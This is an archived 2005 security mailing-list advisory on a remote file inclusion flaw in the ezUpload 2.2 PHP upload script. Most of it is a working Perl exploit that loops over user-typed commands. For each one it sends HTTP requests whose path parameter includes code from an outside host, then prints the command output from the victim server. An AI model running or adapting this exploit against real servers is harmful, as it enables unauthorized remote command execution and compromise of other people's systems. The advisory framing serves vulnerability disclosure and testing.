[EXPL] ezUpload path Parameter Command Execution (Exploit)
From: SecuriTeam (support_at_securiteam.com)
Date: 08/14/05
- Previous message: SecuriTeam: "[UNIX] Blog Torrent Remote User and Password Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 14 Aug 2005 17:51:30 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
ezUpload path Parameter Command Execution (Exploit)
------------------------------------------------------------------------
SUMMARY
ezUpload is a PHP script that allow web sites
to manage upload files.
Due to improper validation of user provided input by ezUpload remote
attackers can cause the program to execute arbitrary code, the following
exploit code can be used to test your system for the mentioned
vulnerability.
DETAILS
Vulnerable Systems:
* EzUpload version 2.2
Exploit:
#!/usr/bin/perl
#__________
#\______ \ ____ __| _/ \______ \____________ ____ ____ ____
# | _// __ \ / __ | | | \_ __ \__ \ / ___\ / _ \ / \
# | | \ ___// /_/ | | ` \ | \// __ \_/ /_/ > <_> ) | \
# |____|_ /\___ >____ | /_______ /__| (____ /\___ / \____/|___| /
# \/ \/ \/ \/ \//_____/ \/
# Bug Discovered By Johnnie Walker <whisky at bsdmail.org>
# credits to ATmaCa.....oh no I forgot I ain't kozan so atmaca no credits
to u
# Greets: sirh0t , siLgi , Elisabeth And Her Bf Mattias
# Red Dragon: Nightmare . Johnnie Walker . 3rbil
# f0rtcu We Never f0rget You
use IO::Socket;
if ($ARGV[0] && $ARGV[1])
{
$host = $ARGV[0];
$path = $ARGV[1];
$target = $ARGV[2];
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host",
PeerPort => "80") || die "Can't connect!\r\n";
while (1) {
print 'RedDrag0n@'.$host.'$ ';
$cmd = <STDIN>;
if ($target == 2) {
$file = "initialize.php?path=http://sinanreklam.net/banner.gif?cmd="
} elsif ($target == 3) {
$file = "customize.php?path=http://sinanreklam.net/banner.gif?cmd="
} elsif ($target == 4) {
$file = "form.php?path=http://sinanreklam.net/banner.gif?cmd="
} else {
$file = "index.php?path=http://sinanreklam.net/banner.gif?cmd="
}
chop($cmd);
last if ($cmd eq 'exit');
print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost:
".$host."\r\nConnection: Keep-Alive\r\n\r\n";
$vuln=0;
while ($ans = <$sock>)
{
if ($vuln == 1) { print "$ans"; }
last if ($ans =~ /^_end_/);
if ($ans =~ /^_begin_/) { $vuln = 1; }
}
if ($vuln == 0) {print "Exploit Failed :(\r\n";exit();}
}
}
else {
print "EzUpload 2.2 Remote Command Execution\r\n\r\n";
print "Target files : \r\n\r\n";
print "1 index.php (default)\r\n";
print "2 initialize.php\r\n";
print "3 customize.php\r\n";
print "4 form.php\r\n\r\n";
print "Usage: perl $0 <host> <path_to_ezupload> [target_nr] \r\n\r\n";
print "Example: perl $0 victim.com /ezupload/ 2 \r\n";
exit;
}
#EoF
ADDITIONAL INFORMATION
The information has been provided by <mailto:whisky@bsdmail.org> Batur
Binbash.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[UNIX] Blog Torrent Remote User and Password Disclosure"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] My_eGallery Code Injection
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... parameter to My_eGallery
so it actually includes malicious PHP code. ... In no event shall we be liable for any
damages whatsoever including direct, indirect, incidental, consequential, loss of business profits
or special damages. ... (Securiteam) - [UNIX] Cross-Site Scripting CuteNews (show_archives, show_news)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... CuteNews is "a powerful
and easy ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam) - [UNIX] vBulletin HTML Injection Vulnerability
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... the Web's quickest-growing
scripting language; ... In no event shall we be liable for any damages whatsoever including
direct, indirect, incidental, consequential, loss of business profits or special damages. ...
(Securiteam) - [UNIX] PHPNuke Multiple Vulnerabilities in Search Module (Comments Search)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... PHPNuke's search module
is susceptible to a cross-site scripting and SQL ... In no event shall we be liable for
any damages whatsoever including direct, indirect, incidental, consequential, loss of business
profits or special damages. ... (Securiteam) - [NT] Websense Blocked Sites XSS
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Websense does not
do any ... In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam)
